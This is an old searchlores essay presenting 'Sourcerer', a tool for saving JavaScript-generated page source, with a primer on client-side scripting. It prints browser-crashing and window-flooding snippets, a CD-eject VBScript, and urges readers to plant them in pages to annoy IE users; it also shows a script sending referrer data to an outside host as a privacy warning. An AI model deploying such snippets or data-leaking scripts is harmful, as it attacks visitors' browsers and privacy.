An html 
protecion 'Wizzard' after having taken his dried frog pills :)
~ Sourcerer ~
Javascript protections busting

v 0.1 May 2003 by Mordred





This file is a part of the sourcerer package. To find the original essays and packages @ searchlores, use namazu.

Overview

The Sourcerer alows you to save the source of those annoying web sites that use JavaScript to generate content. Ordinary browsers can save only the source of the source, for example let's suppose you have a page which says:

<SCRIPT language=javascript><!--
document.write("Hello world");//-->
</SCRIPT>

In your browser you will see only the text "Hello world", but if you save the page's source, you will see only this piece of script. Because of this, some really bad people (you may think it's just funny, but, well, it's not) decided they can make money on the backs of the others, selling them stupid "HTML protection" software, which is more or less a javascript which decodes the actual source on the fly.

Here's what we do. Go to http://www.blmodirect.com/letters/b5012protected.htm (or try the local copy provided in the package if that one is down). Rightclick on the browser window, and choose "View source". Mm, yeah ... tons of crap. Now open the same URL in Sourcerer (copy & paste the URL - that's the only way which is anyway the fastest, so get used to it). Choose Save source and open the result in your text editor. That's about how you use Sourcerer. If you're playing at +Mala's, don't forget to try it on the third riddle :)

If you have a large collection of files to convert (you downloaded them with wGet of course, certainly NOT by hand), you can automate their conversion using the commandline:

Sourcerer.exe "file://localhost/c:/dir with spaces/index.html" c:\no_spaces_therefore_no_quotes\1.html
Sourcerer.exe http://www.searchlores.org index.htm

IMPORTANT! Please, use your brain. Sourcerer uses an IE WebBrowser control, which means that it is effectively an IE copy. Don't use it for browsing, or you'll get hacked, spammed, flooded or made to look stupid in any other way. Proof? (Btw, do copy these snippets in your html pages to annoy the bozos that use IE, or better, find fresh ones ,or learn to write such scripts on your own.)

<input type crash>
Crashes IE, details
<object ID=crash CLASSID='CLSID:00022613-0000-0000-C000-000000000046'> </object>
Crashes IE, details
<script>while(1)w=window.open('','')</script>
Opens windows in a loop, not a major pain in the ass as there is a limit to the number of windows, and the IEXPLORE task can be easily killed
<script>while(1) {
	alert('1');
	document.write("<script>while(1)w=window.open('','')</sc"+"ript>")}
</script>
Improved example: not so easily killed
<SCRIPT LANGUAGE="VBScript"><!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
        For i = 0 to colCDROMs.Count - 1
                colCDROMs.Item(i).Eject
        Next 
End If
--></SCRIPT>
And one for comic relief - eject your cd tray

Note that these snippets will work without any user interaction whatsoever, the examples here requre a button push so you can read the article, duh :) Also, I haven't tested them under many OS/browser combinations, on your system these may behave differently.

Scripting overview

There are more thorough papers on the subject for the interested reader, so this section will be targeted to non-coding seekers, therefore will be kept as low-tech as possible.

The most important thing to know is that HTML scripting is something that happens on YOUR side of the user-internet duet (as opposed to CGI or server-side scripting, which happens on a server). It is also called client-side scripting. The scripts are programs, which are interpreted (i.e. translated into machine-understandable code) and run by your browser.

These little programs can do a lot of things (which some people may consider useful), but are mainly designed to change or add the content of the HTML document like for example printing the current time and date. This means that the page source, which your browser downloads from the remote server, will be one and the same, but still you will see different text each time. Browse to www.searchlores.org with and without JavaScript and see the difference.
1)<SCRIPT LANGUAGE="JavaScript">
2)	document.write("<I>Updated </I>");
3)	document.write("<font color=black>");
4)	document.write(UpdateDate(5,7,2003)); 
5)	document.write("</font></i>");
6)</script>
Let's follow what it does:
The 1) and 6) tags denote a piece of HTML which is a script. If the browser does not support or accept scripting, the contents will be ignored. The "language" attribute tells us (and more importantly - tells the browser) that this is JavaScript. The 2) 3) and 5) lines print some text to the HTML document, which is the same as if the text was directly included in the HTML, while 4) does something more interesting - it calls a function (a subroutine; a small piece of code, defined elsewhere to do routine job) - which prints the number of days since the date, specified by the three numbers (month, day, year).

Note that since the user agents ('browsers') of the current search engines do not intepret scripts, any text written by such means will be visible only to the human reader. For example, compare site:searchlores.org searching with site:searchlores.org updated

Each scripting language (JavaScript, VBScript, JScript) has it's own syntactical rules, which are not subject to this article, and you should normally not worry about them. We can also consider Java and Flash Action Script as such scripting languages (although they are precompiled instead of being interpreted on the fly, but this difference is of no importance here), because they are too executed on the client side. All these languages were designed to be 'secure' in the means that they cannot (rather SHOULD not) read or write files from the user's machine, execute local commands, etc. The sad thing is that exploits are continuously found, which explore bugs in the scripting system, alowing anything from slight annoyances (like opening all your CD trays at once) to serious security breaches (full read/write/execute access to the victim's machine). That's why common sense dictates that we browse with scripting turned off (no matter what browser we use).

Besides exploits, which are unnormal behaviour of the scripting system, it's normal behaviour has some uncanny features too. Being integrated with your browser, JavaScript for example knows WHAT kind of browser it is, what is your OS, your screen resolution, color-depth, browser history and even the contents of your clipboard! You may think that this is okay, since it's executed only on your machine, but it's not, since you can do something like this:
<script language=javascript>
	document.write("<img src='http://myserver.com/my_fake_image_script.gif?" + document.refferer + "'>");
</script>
This means that we include in the page's source an image tag, and the image source we provide is in fact a masquaraded SERVER-SIDE script, which, when your browser blindly goes to download that image, will receive the reffering URL. Or the screen width. Or the clipboard. Or you can make the page periodically check (while it is active) if there's something new in the clipboard and send it to your server. Do you copy and paste your passwords?

Btw Opera users are not much more immune to these tricks, as even with images loading turned off, some images can be loaded through css or javascript. The paranoid to the bone should use wGet with the --page-requisites option, with faked refferer and user-agent fields through a secure proxy to download the page they want to view. Then disconnect from the internet, manually check each file for suspicious code (did you know that in the past Netscape Navigator would execute javascript hidden in GIF comments?), render the page through Sourcerer, manually cut remaining scripts, and then hope that his browser would not be crashed by the latest strange exploit. It's not an easy life, being paranoid :) Yeah, well, just turn off JavaScript, okay?

Finale

The sources are included in the package, do whatever you want with them, I don't care. To save the curious their precious time, the essence of this program is this snippet:
		Dim doc As HTMLDocument
		Set doc = Browser.Document
		...
		s = doc.documentElement.outerHTML



Petit image
Bk:flange of myth 
(c) 1952-2032: [fravia+], all rights reserved